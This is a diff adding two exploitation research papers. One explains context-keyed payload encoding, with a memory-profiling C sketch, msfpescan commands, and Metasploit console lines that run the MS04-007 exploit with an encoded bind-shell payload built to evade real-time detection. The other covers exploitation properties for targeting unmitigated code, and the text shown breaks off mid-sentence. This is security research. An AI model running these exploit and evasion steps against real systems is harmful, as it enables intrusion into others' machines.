+ +Profiling the Application + +To successfully select a context-key from a running application's memory, the +application's memory must first be profiled. By polling the application's +address space over a period of time, ranges of memory that change can be +eliminated from the potential context-key data pool. The primary requirement +of viable data in the process's memory space is that it does not +change over time or between subsequent instantiations of the running +application. After profiling is complete, the resultant list of memory +addresses and static data will be referred to as the application's +memory map. + +Memory Map Creation + +The basic steps to create a comprehensive memory map of a running process are: + +1. Attach to the running process. +2. Initialize the memory map with a poll of non-null bytes in the running + process's virtual memory. +3. Wait an arbitrary amount of time. +4. Poll the process's virtual memory again. +5. Find the differential between the contents of the memory map and the most + recent memory poll. +6. Eliminate any data that has changed between the two from the memory map. +7. Optionally eliminate any memory ranges shorter than your desired key length. +8. Go to step 3. + +Continue the above process until changing data is no longer being eliminated +and store the resulting memory map as a map of that instance of the target +process. Restart the application and repeat the above process, producing a +second memory map for the second instance of the target process. Compare the +two memory maps for differences and again eliminate any data that differs. +Repeat this process until changing data is no longer being eliminated. + +The resulting final memory map for the process must then be analyzed for +static data that may be directly relative to the environment of the process +and may not be consistent across processes running within different +environments such as on different hosts or in different networks. This type +of data includes network addresses and ports, host names, operating system +"unames", and so forth. This type of data may also include installation +paths, user names, and other user-configurable options during installation of +the application. This type of data does not include application version +strings or other pertinent information which may be directly relative to the +properties of the application which contribute to the application being +vulnerable and successfully exploited. + +Identifying this type of information relative to the application's environment +will produce two distinct types of memory map data; one type containing static +application context data, and the other type containing environment context +data. Both of these types of data can be useful as potential context-key +values, however, the former will be more portable amongst targets whereas the +latter will only be useful when selecting key values for the actual target +process that was actively profiled. If it is undesirable, introducing +instantiation of processes being profiled on different network hosts and with +different installation configuration options to the memory map generation +process outlined above will likely eliminate the latter from the memory map +entirely. + +Finally, the memory maps can be trimmed of any remaining NULL bytes to reduce +their size. The final memory map should consist of records containing memory +addresses and the string of static data which can be found in memory at those +locations. 
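As an illustration of the polling step, the following C sketch profiles a
single, hypothetical address range of a target Windows process and discards
any byte that changes between polls. A real profiler (such as the smem-map
tool discussed below) would walk every readable region, handle read failures,
and persist its results in a memory map file; the base address, range size,
poll count, and delay used here are arbitrary placeholder values.

/* profile.c - eliminate changing bytes from a candidate context-key range. */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define POLLS      10
#define POLL_DELAY 5000               /* milliseconds between polls */

int main(int argc, char **argv)
{
    DWORD  pid;
    BYTE  *base = (BYTE *)0x00400000; /* placeholder range to profile */
    SIZE_T size = 0x1000, got, j;
    BYTE  *map, *poll;
    HANDLE h;
    int    i;

    if (argc < 2)
        return 1;

    pid  = (DWORD)atoi(argv[1]);      /* target process id */
    map  = malloc(size);              /* surviving candidate bytes */
    poll = malloc(size);

    h = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, pid);
    if (!h || !ReadProcessMemory(h, base, map, size, &got))
        return 1;                     /* the first snapshot seeds the map */

    for (i = 0; i < POLLS; i++) {
        Sleep(POLL_DELAY);
        if (!ReadProcessMemory(h, base, poll, size, &got))
            break;
        for (j = 0; j < size; j++)    /* eliminate anything that changed */
            if (map[j] != poll[j])
                map[j] = 0;
    }

    for (j = 0; j < size; j++)        /* whatever survives is static data */
        if (map[j])
            printf("%p: 0x%02x\n", (void *)(base + j), map[j]);

    CloseHandle(h);
    return 0;
}

Repeating this process against a second instance of the application and
intersecting the results yields the cross-instance map described above.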
+ +Memory Map Creation Methods + + Metasploit Framework's msfpescan + +One method to create a memory map of viable addresses and values is to use a +tool provided by the Metasploit Framework called msfpescan. msfpescan is +designed to scan PE formatted executable files and return the requested +portion of the .text section of the executable. Data found in the .text +section is useful as potential context-key data as the .text section is marked +read-only when mapped into a process' address space and is therefore static +and will not change. Furthermore, msfpescan predicts where in the executed +process' address space these static values will be located, thus providing +both the static data values as well as the addresses at which those values can +be retrieved. + +To illustrate, suppose a memory map for the Windows System service needs to be +created for exploitation of the vulnerability described in Microsoft Security +Bulletin MS06-040[11] by an exploit which will employ a context-keyed payload +encoder. A common DLL that is linked into the service's executable when +compiled can be selected as the target for msfpescan. In this case, +ws2help.dll is chosen due to its lack of updates since August 23rd, 2001. +Because this particular DLL has remained unchanged for over six years, its +instructions provide a particularly consistent cache of potential context-keys +for an exploit targeting an application linked against it anytime during the +last six years. A scan of the first 1024 bytes of ws2help.dll's executable +instructions can be performed by executing the following command: + +msfpescan -b 0x0 -A 1024 ws2help.dll + +Furthermore, msfpescan has been improved via this research effort to render +data directly as a memory map. This improved version is available in the +Metasploit Framework as of version 3.1. A scan and dump to memory map of +ws2help.dll's executable instructions can be performed by executing the +following command: + +msfpescan --context-map context ws2help.dll + +It is important to note that this method of memory map generation is much less +comprehensive than the method previously outlined; however, when targeting a +process whose executable is relatively large and links in a large number of +libraries, profiling only the instruction portions of the executable and +library files involved may provide an adequately-sized memory map for +context-key selection. + + Metasploit Framework's memdump.exe + +The Metasploit Framework also provides another useful tool for the profiling +of a running process' memory called memdump.exe. memdump.exe is used to dump +the entire memory space of a running process. This tool can be used to +provide the polling step of the memory map creation process previously +outlined. By producing multiple memory dumps over a period of time, the dumps +can be compared to isolate static data. + + smem-map + +A tool for profiling a Linux process' address space and creating a memory map +is provided by this research effort. The smem-map tool[12] was created as a +reference implementation of the process outlined at the beginning of this +section. smem-map is a Linux command-line application and relies on the proc +filesystem as an interface to the target process' address space. + +The first time smem-map is used against a target process, it will populate an +initial memory map with all non-null bytes currently found in the process's +virtual memory. 
Subsequent polls of the memory ranges that were initially +identified will eliminate data that has changed between the memory map and the +most recent poll of the process's memory. If the tool is stopped and +restarted and the specified memory map file exists, the file will be reloaded +as the memory map to be compared against instead of populating an entirely new +memory map. Using this functionality, a memory map can be refined over +multiple sessions of the tool as well as multiple instantiations of the target +process. A scan of a running process' address space can be performed by +executing the following command: + +smem-map output.map + + Context-Key Selection + +Once a memory map has been created for the target application, the encoder may +select any sequential data from any memory address within the memory map which +is both large enough to fill the desired key length and also does not produce +any disallowed byte values in the encoded payload as defined by restrictions +to the attack vector for the vulnerability. The decoder stub should then +retrieve the context-key from the same memory address when executed at the +target. If the decoder stub is developed so that it may read individual bytes +of data from different locations, the encoder may select individual bytes from +multiple addresses in the memory map. The encoder must note the memory +address or addresses at which the context-key is read from the memory map for +inclusion in the decoder stub. + + Proof of Concept: Improved Shikata ga Nai + +The Shikata ga Nai encoder[9], included with the Metasploit Framework, implements +polymorphic XOR additive feedback encoding against a four byte key. The +decoder stub that is prepended to a payload which has been encoded by Shikata +ga Nai is generated based on dynamic instruction substitution and dynamic +block ordering. The registers used by the decoder stub instructions are also +selected dynamically when the decoder stub is constructed. + +Improving the original Metasploit implementation of Shikata ga Nai to use +contextual keying was fairly trivial. Instead of randomly selecting a four +byte key prior to encoding, a key is instead chosen from a supplied memory +map. Furthermore, when generating the decoder stub, the original +implementation used a "mov reg, val" instruction (0xb8) to move the key value +directly from its location in the decoder stub into the register it will use +for the XOR operation. The context-key version instead uses a "mov reg, +[addr]" instruction (0xa1) to retrieve the context-key from the memory +location at [addr] and store it in the same register. The update to the +Shikata ga Nai decoder stub was literally as simple as changing one +instruction, and providing that instruction with the context-key's location +address rather than a static key value directly. + + +The improved version of Shikata ga Nai described here is provided by this +research effort and is available in the Metasploit Framework as of version +3.1. It can be utilized as follows from the Metasploit Framework Console +command-line, after the usual exploit and payload commands: + +set ENCODER x86/shikata_ga_nai +set EnableContextEncoding 1 +set ContextInformationFile +exploit + + Case Study: MS04-007 vs. Windows XP SP0 + +The Metasploit framework currently provides an exploit for the vulnerability +described in Microsoft Security Bulletin MS04-007[13]. The vulnerable application +in this case is the Microsoft ASN.1 Library. 
+ +Before any exploitation using contextual keying can take place, the vulnerable +application must be profiled. By opening the affected library from Windows XP +Service Pack 0 in a debugger, a list of libraries that it itself includes can +be gleaned. By collecting said library DLL files from the target vulnerable +system, or an equivalent system in the lab, msfpescan can then be used to +create a memory map: + +msfpescan --context-map context \ + ms04-007-dlls/* +cat context/* >> ms04-007.map + +After the memory map has been created, it can be provided to Metasploit and +Shikata ga Nai to encode the payload that Metasploit will use to exploit the +vulnerable system: + +use exploit/windows/smb/ms04-007-killbill +set PAYLOAD windows/shell_bind_tcp +set ENCODER x86/shikata_ga_nai +set EnableContextEncoding 1 +set ContextInformationFile ms04-007.map +exploit + +2.3.2) Event Data + +Similar to the static application data approach, transient data may also be +used as a context-key so long as it persists long enough for the decoder stub +to access it. Consider the scenario of a DNS server which is vulnerable to an +overflow when parsing an incoming host name or address look-up request. If +portions of the request are stored in memory prior to the vulnerability being +triggered, the data provided by the request could potentially be used for +contextual keying if it's location is predictable. Values such as IP +addresses, port numbers, packet sequence numbers, and so forth are all +potentially viable for use as a context-key. + +2.3.3) Supplied Data + +Similar to Event Data, an attacker may also be able to supply key data for +later use to the memory space of the target application prior to exploitation. +Consider the scenario of a caching HTTP proxy that exhibits the behavior of +keeping recently requested resources in memory for a period of time prior to +flushing them to disk for longer-term storage. If the attacker is aware of +this behavior, the potential exists for the attacker to cause the proxy to +retrieve a malicious web resource which contains a wealth of usable +context-key data. Even if the attacker cannot predict where in memory the +data may be stored, by having control of the data that is being stored other +exploitation techniques such as egg hunting[14, 9][15] may be used by a +decoder-stub to locate and retrieve context-key information when its exact +location is unknown. + +2.4) Temporal Keys + +The concept of a temporal address was previously introduced by the paper +entitled Temporal Return Addresses: Exploitation Chronomancy[16, 3]. In +summary, a temporal address is a location in memory which holds timer data of +some form. Potential types of timer data stored at a temporal address include +such data as the system date and time, number of seconds since boot, or a +counter of some other form. + +The research presented in the aforementioned paper focused on leveraging the +timer data found at such addresses as the return address used for +vulnerability exploitation. As such, the viability of the data found at the +temporal address was constrained by two properties of the data defined as +scale, and period. These two properties dictate the window of time during +which the data found at the temporal address will equate to the desired +instructions. Another potential constraint for use of a temporal address as +an exploit return address stems from the fact that the value contained at the +temporal address is called directly for use as an executable instruction. 
If +the memory range it is contained within is marked as non-executable such as +with the more recent versions of Windows[16, 19], attempting use in this manner +will cause an exception. + +For the purpose that temporal addresses will be employed here, such strict +constraints as those previously mentioned do not exist. Rather, the only +desired property of the data stored at the temporal address which will be used +as a context-key is that it does not change, or as in the case of temporal +data, does not change during the time window in which we intend to use it. +Due to this difference in requirements, the actual content of the temporal +address is somewhat irrelevant and therefore is not constrained to a +time-window in either the future or the past during which the data found at +the temporal address will be fit for purpose. The viable time-window in the +case of use for contextual keying is entirely constrained by duration rather +than location along the time-line. Due to the values at different byte +offsets within data found at a temporal address having differing update +frequencies, selection of key data from these values produces varying duration +time-windows during which the values will remain constant. By using single +byte, dual byte, or otherwise relatively short context-keys, and carefully +selecting from the available byte values stored within the timer found at the +temporal address, the viable time-window chosen can be made to be quite +lengthy. + +2.4.1) Context-Key Selection + +Provided by the previously mentioned temporal return address research effort +is a very useful tool called telescope[16, 8]. The tool's function is to analyze a +running process' memory for potential temporal addresses and report them to +the user. By using this tool, potential context-key values and the addresses +at which they reside can be respectively predicted and identified. + +The temporal return addresses paper also revealed a section of memory that is +mapped into all processes running on Windows NT, or any other more recent +Windows system, called SharedUserData[16, 17]. The interesting properties of the +SharedUserData region of a process' address space is that it is always mapped +into memory at a predictable location and is required to be backwards +compatible with previous versions. As such, the individual values contained +within the region will always be at the same offset to it's predictable base +address. One of the values contained within this region of memory is the +system time, which will be used in the examples to follow. + + Remotely Determining Time + +Methods and techniques for profiling a target system's current time is outside +of the scope of this paper, however the aforementioned paper on temporal +return addresses[16, 13-15] offers some insight. Once a target system's +current time has been identified, the values found at various temporal +addresses in memory can be readily predicted to varying degrees of accuracy. + + Time-Window Selection + +It is important to note that when using data stored at a temporal address as a +context-key, parts of that value are likely to be changing frequently. +Fortunately, the key length being used may not require use of the entire timer +value, and as such the values found at the byte offsets that are frequently +changing can likely be ignored. Consider the SystemTime value from the +Windows SharedUserData region of memory. 
SystemTime is a 100 nanosecond timer +which is measured from January 1st, 1601, is stored as a KSYSTEM_TIME +structure, and is located at memory address 0x7ffe0014 on all versions of +Windows NT[16, 16]: + +0:000> dt _KSYSTEM_TIME + +0x000 LowPart : Uint4B + +0x004 High1Time : Int4B + +0x008 High2Time : Int4B + +Due to this timer's frequent update period, granularity, and scale, some of +the data contained at the temporal address will be too transient for use as a +context-key. The capacity of SystemTime is twelve bytes, however due to the +four bytes labeled as High2Time having an identical value as the four bytes +labeled as High1Time, only the first eight bytes are relevant as a timer. As +shown by the calculations provided by the temporal return addresses paper[16, +10], reproduced below as Figure , it is only worth focusing on values +beginning at byte index four of the SystemTime value, or the four bytes +labeled as High1Time located at address 0x7ffe0018. + ++------+----------------------------------+ +| Byte | Seconds (ext) | ++------+----------------------------------+ +| 0 | 0 (zero) | +| 1 | 0 (zero) | +| 2 | 0 (zero) | +| 3 | 1 (1 sec) | +| 4 | 429 (7 mins 9 secs) | +| 5 | 109951 (1 day 6 hours 32 mins) | +| 6 | 28147497 (325 days 18 hours) | +| 7 | 7205759403 (228 years 179 days) | ++------+----------------------------------+ + +It is also interesting to note that if the payload encoder only utilizes a +single byte context-key, it may not even be required that the attacker +determine the target system's time, as the value at byte index six or seven of +the SystemTime value could be used requiring only that the attacker guess the +system time to within a little less than a year, or to within 228 years, +respectively. + +3) Weaknesses + +Due to the cryptographically weak properties of using functions such as XOR to +obfuscate data, there exist well known attacks against these methods and their +keying information. Although payload encoders which employ XOR as their +obfuscation algorithm have been discussed extensively throughout this paper, +it is not the author's intent to tie the the contextual keying technique +presented here to such algorithms. Rather, contextual keying could just as +readily be used with cryptographically strong encoding algorithms as well. As +such, attacks against the encoding algorithm used, or specifically against the +XOR algorithm, are outside the scope of this paper and will not be detailed +herein. + +4) Conclusion + +While the use of context-keyed payload encoders likely won't prevent a +dedicated forensic analyst from successfully performing an off-line analysis +of an exploit's encoded payload, the system it was targeting, and the target +application in an attempt to discover the key value used, use of the +contextual keying technique will prevent an automated system from decoding the +payload in real-time if it does not have access to, or an automated method of +constructing, an adequate memory map of the target from which to retrieve the +key. + +As systems hardware technology and software capability continue to improve, +network security and monitoring systems will likely begin to join the few +currently existing systems[5, 2-4][4] that attempt to perform this type of real-time +analysis of suspected network exploit traffic, and more specifically, exploit +payloads. + +4.1) Acknowledgments + +The Author would like to thank H.D. Moore and Matt Miller a.k.a. 
skape for +their assistance in development of the improved Metasploit implementation of +the Shikata ga Nai payload encoder as Proof of Concept as well as the +supporting tools provided by this research effort. + +References + +[1] Ivan Arce. The shellcode generation. IEEE Security & Privacy, + 2(5):72-76, 2004. + +[2] skape. Implementing a custom x86 encoder. Uninformed Journal, 5(3), + September 2006. + +[3] Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, Sinan Eren, Neel + Mehta, Riley Hassell. The Shellcoder's Handhook: Discovering and + Exploiting Security Holes. John Wiley & Sones, 2004. + +[4] Paul Baecher and Markus Koetter. libemu. http://libemu.mwcollect.org/, + 2007. + +[5] R. Smith, A. Prigden, B. Thomason, and V. Shmatikov. Shellshock: Luring + malware into virtual honeypots by emulated response. October 2005. + +[6] SkyLined and Pusscat. Alpha2 alphanumeric mixedcase encoder (x86). + http://framework.metasploit.com/encoders/view/?refname=x86:alpha_mixed. + +[7] SkyLined and Pusscat. Alpha2 alphanumeric unicode mixedcase encoder (x86). + http://framework.metasploit.com/encoders/view/?refname=x86:unicode_mixed. + +[8] H.D. Moore and spoonm. Call+4 dword xor encoder (x86). + http://framework.metasploit.com/encoders/view/?refname=x86:call4_dword_xor. + +[9] spoonm. Polymorphic xor additive feedback encoder (x86). + http://framework.metasploit.com/encoders/view/?refname=x86:shikata_ga_nai. + +[10] vlad902. Single-byte xor countdown encoder (x86). + http://framework.metasploit.com/encoders/view/?refname=x86:countdown. + +[11] Microsoft. Microsoft security bulletin ms06-040. + http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx, August + 2006. + +[12] |)ruid. smem-map - the static memory mapper. + https://sourceforge.net/projects/smem-map. + +[13] Microsoft. Microsoft security bulletin ms04-007. + http://www.microsoft.com/technet/security/bulletin/ms04-007.mspx, + February, 2004. + +[14] The Metasploit Staff. Metasploit 3.0 Developer's Guide. + The Metasploit Project, December 2005. + +[15] skape. Safely searching process virtual address space. + http://hick.org/code/skape/papers/egghunt-shellcode.pdf, September 2004. + +[16] skape. Temporal return addresses. Uninformed Journal, 2(2), September + 2005. + +[17] SweetScape Software. 010 editor. http://www.sweetscape.com/010editor/, + 2002. + +[18] |)ruid. Memorymap.bt. http://druid.caughq.org/src/MemoryMap.bt, 2007. + +Appendix + +A) Memory Map File Specification + +The memory map files created by this research effort's supporting tools adhere +to the file format specification described here. The file format is designed +specifically to be simple, light weight, and versatile. + +A.1) File Format + +An entire memory map file is comprised of individual data records concatenated +together. These individual data records represent a chunk of data found in a +process's memory space. This simple format allows for multiple memory map +files to be further concatenated to produce a single larger memory map file. 
+Individual data records are comprised of the following elements: + ++----------+------------+--------------+ +| Bit-Size | Byte-Order | Element | ++----------+------------+--------------+ +| 8 | n/a | Data Type | +| 32 | big-endian | Base Address | +| 32 | big-endian | Size | +| Size | n/a | Data | ++----------+------------+--------------+ + +A.2) Data Type Values + +The Data Type values are currently defined in the following table: + ++-------+-------------------+ +| Value | Type | ++-------+-------------------+ +| 0 | Reserved | +| 1 | Static Data | +| 2 | Temporal Data | +| 3 | Environment Data | ++-------+-------------------+ + +A.3) File Parsing + +Parsing of a memory map file is as simple as beginning with the first byte in +the file, reading the first three elements of the data record as they are of +fixed size, then using the last of those three elements as size indicator to +read the final element. If any data remains in the file, there is at least +one more data record to be read. + +To provide for easy parsing and review of memory map files, an 010 Editor +template is provided by this research effort. diff --git a/uninformed/9.4.txt b/uninformed/9.4.txt new file mode 100644 index 0000000..89a0ae7 --- /dev/null +++ b/uninformed/9.4.txt @@ -0,0 +1,875 @@ +Improving Software Security Analysis using Exploitation Properties +12/2007 +skape +mmiller@hick.org + +Abstract + +Reliable exploitation of software vulnerabilities has continued to become more +difficult as formidable mitigations have been established and are now included +by default with most modern operating systems. Future exploitation of +software vulnerabilities will rely on either discovering ways to circumvent +these mitigations or uncovering flaws that are not adequately protected. +Since the majority of the mitigations that exist today lack universal bypass +techniques, it has become more fruitful to take the latter approach. It is in +this vein that this paper introduces the concept of exploitation properties +and describes how they can be used to better understand the exploitability of +a system irrespective of a particular vulnerability. Perceived exploitability +is of utmost importance to both an attacker and to a defender given the +presence of modern mitigations. The ANI vulnerability (MS07-017) is used to +help illustrate these points by acting as a simple example of a vulnerability +that may have been more easily identified as code that should have received +additional scrutiny by taking exploitation properties into consideration. + +1) Introduction + +Modern exploit mitigations have become formidable opponents with respect to +the effect they have on reliable exploitation. Some of the more substantial +modern mitigations include GuardStack (GS), SafeSEH, DEP (NX), ASLR, pointer +encoding, and various heap improvements[8, 9, 10, 15, 24, 3, 4]. The fact +that there have been very few public exploits that have been able to +universally bypass all of these mitigations at once is a testament to the +resilience of these techniques working in concert with one another. It is +obvious that the absence of a given mitigation directly contributes to the +exploitability of the associated code. Likewise, it is also well known that +most mitigations have situations in which they will offer little to no +protection[5, 16, 18, 20, 2, 4]. 
For instance, in certain cases, it may be +possible to perform a partial overwrite on Windows Vista to defeat ASLR due to +the fact that only 15 bits of most 32-bit addresses may be affected by +randomization[2, 17]. Other mitigations also have situations where they may +not provide adequate coverage. + +Given the fact that the majority of mitigations have known limitations, it +makes sense to consider where this information might be useful. In the field +of program analysis, whether it be manual, static, or dynamic, the question of +scoping is often pertinent. This question typically revolves around figuring +out what areas of code should be reviewed and what precedence, if any, should +be assigned to different regions. Typical approaches taken to accomplish this +often involve identifying code that straddles a trust boundary or performs +complex operations reachable from a trust boundary. However, depending on +one's perspective, this type of approach is insufficient in the face of modern +mitigations because it may result in areas of code being reviewed that are +adequately protected by all mitigations. + +To help address this perceived deficiency, this paper introduces the concept +of exploitation properties and describes how they can be used to provide a +better understanding of exploitability of a system if a vulnerability is found +to be present. Regions of code that are found to have a number of distinct +exploitation properties may be more interesting from an exploitation +standpoint and therefore may warrant additional scrutiny from a program +analysis perspective. The use of exploitation properties may benefit both an +attacker and a defender. For example, companies may wish to perform targeted +reviews on areas of code that may be more trivially exploited in an effort to +prevent reliable exploits from being released in the future. Likewise, an +attacker searching for a vulnerability may wish to avoid auditing regions of +code that are likely to be more difficult to exploit. + +Exploitation properties represent additional criteria that can be used when +attempting to better understand the security aspects of a program. Annotating +regions of code with exploitation properties makes it possible to use set +unions and intersections to identify the subset of interesting regions of code +for a particular analysis problem. For example, an attacker may wish to +determine the regions of code that may permit the use of traditional +stack-based buffer overflow techniques as well as permitting a partial +overwrite of a return address in order to defeat ASLR. Using these two +exploitation properties as criteria, a narrowed subset can be produced +which contains only those regions which meet both criteria by intersecting +those regions that have both exploitation properties. For the purpose of +this paper, the term narrowing is not used in the strict mathematical +sense; rather, this paper uses narrowing to describe the process of +constraining the scope of analysis through the use of specific criteria. + +The concept of using automated analysis as a precursor to more strenuous +program analysis is certainly not new. There have been many tools ranging +from the simple detection of calls to strcpy to much more sophisticated forms +of static analysis. 
Still, the use of exploitation properties can be seen as
+an additional set of data points which may be useful in the context of program
+analysis given the hypothesis that most reliably exploitable security
+vulnerabilities are being pushed into areas of code that are less affected by
+mitigations.
+
+The concept of exploitation properties is presented as follows. Section 2
+categorizes and defines a limited number of concrete exploitation properties.
+Section 3 provides a concrete example of using exploitation properties to help
+identify the function that contained the ANI vulnerability. Section 4
+describes some potential ways in which exploitation properties can be applied.
+Section 5 gives a brief description of future work involving exploitation
+properties.
+
+2) Exploitation Properties
+
+Exploitation properties describe the ease with which an arbitrary
+vulnerability might be exploited. An understanding of a system's perceived
+exploitability can provide useful insights when attempting to establish the
+risk factors associated with it. An example of this can be seen in threat
+modeling where the DREAD model of classifying risk includes a high-level
+evaluation of exploitability as one of the risk factors[14]. It is important
+to note that exploitation properties do not provide any indication that a
+vulnerability exists; instead, they are only meant to convey information about
+how easily a vulnerability could be exploited. The concept of an exploitation
+property can be broken into different categories which are tied to the
+configuration or context that the property is associated with. Examples of
+these categories include platforms, processes, binary modules, functions, and
+so on.
+
+The following subsections provide concrete examples to better illustrate the
+concept of an exploitation property. These examples are given by showing what
+implications a property has with respect to exploitation as well as how a
+property might be derived. It should be noted that the examples given in this
+paper do not represent a complete, exhaustive set of exploitation properties.
+
+2.1) Platform Properties
+
+Exploitation properties associated with a platform are meant to illustrate how
+easily a vulnerability may be exploited when a given platform configuration,
+such as the operating system or architecture, is used. For example, Windows
+2000 does not include support for enforcing non-executable pages. This
+implies that any vulnerability found within an application that runs in the
+context of the Windows 2000 platform may be exploited more easily. An
+understanding of exploitation properties that are associated with a platform
+may be useful when attempting to assess the risk of applications that might
+run on multiple platforms. There are many other examples of exploitation
+properties that are tied to platforms. In order to limit the scope of this
+document, platform exploitation properties are not discussed at length.
+
+2.2) Process Properties
+
+Process exploitation properties carry some information about how easily
+vulnerabilities found within the context of a running process may be
+exploited. For example, Internet Explorer running on 32-bit versions of
+Windows Vista does not make use of hardware-enforced DEP (NX) by default. This
+means that any vulnerabilities found within code that runs in the context of
+Internet Explorer will not be protected by non-executable regions.
An +understanding of exploitation properties that are associated with a process +context can help to provide a better understanding of the risks associated +with code that may run in the context of a given process. In order to limit +the scope of this document, process exploitation properties are not discussed +at length. + +2.3) Module Properties + +Module exploitation properties are used to illustrate the effect that a +particular binary module has on ease of exploitation. This category of +properties is useful when attempting to identify binaries that may be more +easily exploited if a vulnerability is found within them or in code that +depends on them. This subsection describes two examples of module +exploitation properties. + +2.3.1) No Support for ASLR + +Windows Vista was the first major release of Windows to include a built-in +implementation of Address Space Layout Randomization (ASLR)[15,24]. In order +to head off potential application compatibility issues, Microsoft chose to +make ASLR an opt-in feature by requiring binaries to be compiled with a new +compiler switch (/dynamicbase)[21]. This compiler switch is responsible for +setting a bit (0x40) in the DllCharacteristics that are defined within a +binary. If this bit is set, the Windows kernel will attempt to randomize the +base address of the binary when it is mapped into memory the first time. If +the bit is not set, the binary will not have its base address randomized, +although it could be relocated in memory if the binary's preferred region is +already occupied by another allocation. As such, any binary that does not +support ASLR may be mapped at a predictable location within a process address +space at execution time. This can allow an attacker to make assumptions about +the address space which may make exploitation easier if a vulnerability is +found within any code that is mapped into the same address space as the module +of interest. + +2.3.2) No Support for SafeSEH + +With Visual Studio 2003, Microsoft introduced a compile-time change known as +SafeSEH which attempts to act as a mitigation for the SEH overwrite attack +vector[5,9]. SafeSEH works by adding a static list of known good exception +handlers that are considered valid as metadata within a given binary. +Binaries that support SafeSEH allow the exception dispatcher to perform +additional checks when dispatching exceptions. The most important check +involves determining if an exception handler that is found to exist within the +mapped region of a given binary is actually considered to be one of the safe +exception handlers. If the exception handler is not a safe exception handler, +the exception dispatcher can take steps to prevent it from being called. This +behavior works to mitigate the potential exploitation vector. + +In order to communicate this information to the exception dispatcher, modern +PE files include fields in the load config data directory which hold the +offset of the safe exception handler table and the number of elements found +within the table. The load config data directory contains meta data that is +useful to the dynamic loader such as information about safe exception +handlers, the module's global security cookie address, and so on[13]. 
The following output from dumpbin.exe illustrates what this might look like:
+
+        310751E0 Safe Exception Handler Table
+               1 Safe Exception Handler Count
+
+    Safe Exception Handler Table
+
+          Address
+          --------
+          310357D1  __except_handler4
+
+Unfortunately, as with ASLR, the benefits offered by SafeSEH are not complete
+unless every binary that is loaded into an address space has been compiled to
+make use of SafeSEH. If a binary has not been compiled to make use of
+SafeSEH, an attacker may be able to use any address found within the binary's
+memory mapping as an exception handler in conjunction with an SEH overwrite.
+
+2.4) Function Properties
+
+Function exploitation properties convey information about how a function
+contributes to the exploitability of an application. For example, a function
+might make it possible to use certain exploitation techniques that might
+otherwise be prevented if mitigations were present. Alternatively, a function
+might simply assist in the exploitation process. Function exploitation
+properties are especially useful because they provide more detailed
+information than exploitation properties that are derived from the platform,
+process, or module context.
+
+2.4.1) Absence of GuardStack
+
+The GuardStack (GS) support included with versions of the Microsoft Visual
+Studio compiler since 2002 offers a compile-time mitigation to traditional
+stack-based buffer overflows[23]. It accomplishes this through a combination
+of a random canary inserted into a stack frame at runtime and an intelligent
+stack frame layout algorithm. The random canary is pushed onto the stack when
+a function is called and then popped off the stack and validated prior to
+function return. If the canary does not match the expected value, it is
+assumed that a stack-based buffer overflow occurred and that the process
+should be terminated.
+
+Since the initial release of GS support, a number of techniques have been
+described that could be used to bypass or weaken it[5, 16, 20]. While these
+techniques were at one time useful or have not yet been fully realized, the
+author assumes that most would agree that the GS implementation provided by
+the most recent compiler is robust (with the exception of SEH). There is
+currently no publicly known universal bypass technique for GS that the author
+is aware of. Given this assumption, functions that are protected by GS become
+less interesting from the standpoint of identifying stack-based buffer
+overflows. On the other hand, functions that are not protected by GS can
+instantly be qualified as interesting targets for review. This is especially
+true with binaries that have been compiled with GS support but contain a
+number of functions that the compiler has chosen not to compile with GS
+protections. This choice is made by taking into account certain conditions,
+such as the presence or absence of local variables that are declared as
+fixed-size arrays.
+
+As previous research has illustrated[27], it is possible to identify functions
+that have not been compiled to use GS through the use of simple static
+analysis tools. It is also possible to further refine the approaches
+described in previous research if one has symbols and one assumes that the
+most recent compiler was used. This can be accomplished by analyzing the call
+graph of an executable and noting the set of functions that do not call
+__security_check_cookie. Considered another way, the same set of functions
+can be identified by taking the set of all functions contained within a
+binary less the subset that call __security_check_cookie. The set of
+functions that is identified by either approach can be annotated with an
+exploitation property that indicates that they may contain stack-based buffer
+overflows that would not be hindered by GS.
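+
+To make the compiler's choice more concrete, consider the following minimal
+sketch. The functions and types are hypothetical and were written purely for
+illustration; the comments describe the commonly documented /GS heuristics
+rather than the guaranteed behavior of any particular compiler version.
+
+#include <string.h>
+
+struct settings {
+    unsigned long width;   /* scalar fields only -- no array members */
+    unsigned long height;
+    unsigned long flags;
+};
+
+/* No stack array is present, so the compiler will typically not insert a
+ * GS cookie here. An attacker-controlled length passed to memcpy would
+ * overflow the frame with no cookie in place to detect it. */
+void likely_unprotected(const unsigned char *src, size_t len)
+{
+    struct settings s;
+    memcpy(&s, src, len);
+}
+
+/* The fixed-size character array typically causes the compiler to insert
+ * and validate a GS cookie for this function. */
+void likely_protected(const char *src)
+{
+    char name[64];
+    strncpy(name, src, sizeof(name) - 1);
+    name[sizeof(name) - 1] = '\0';
+}
+
+Functions shaped like likely_unprotected are the ones that the exploitation
+property described above is intended to flag.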
+
+It may also be prudent to take the compiler version that was used into
+consideration when analyzing binaries. This is important due to the fact that
+older versions of the compiler used a GS implementation that could be
+trivially defeated in certain circumstances[16]. For example, previous
+versions of GS did not lay out the stack frame in a manner that would prevent
+an attacker from overwriting other local variables and function arguments. In
+scenarios where this occurred and an overwritten local variable or parameter
+was dereferenced (such as by invoking a function pointer), the mitigation
+offered by GS would be meaningless. Thus, a secondary exploitation property
+could involve identifying functions where attacks such as the one described
+above could be possible.
+
+2.4.2) Partial Overwrite Feasibility
+
+One of the unique consequences of implementing Address Space Layout
+Randomization (ASLR) on Windows is the limitation that the system allocation
+granularity imposes on the number of bits that can be randomized within most
+memory allocations. In particular, the allocation granularity used by Windows
+enforces strict 16-page alignment for the base addresses of most memory
+mappings in user-mode. This restriction means that it is only possible to
+introduce entropy into the low 15 bits of the high-order 16 bits of a 32-bit
+memory mapping[17]. While this may sound odd at first glance, the high-order
+bit is not randomized due to the divide between kernel and user-mode. This
+assumes that a machine is booted without /3GB. The low-order 16 bits remain
+unchanged relative to the high-order bits. This caveat means that it may be
+possible to perform a partial overwrite of an address and thus bypass the
+security features offered by ASLR[2]. However, the ability to perform a
+partial overwrite also relies on the presence of useful code or data within a
+region that is relative to the address that is being overwritten.
+
+To visualize how this type of information might be useful, consider a
+scenario where an attacker is performing a partial overwrite of a return
+address on the stack. In this situation, it is often necessary for one or
+more useful opcodes to be present at an address that is 16-page relative to
+the return address. For example, consider a scenario where the function f may
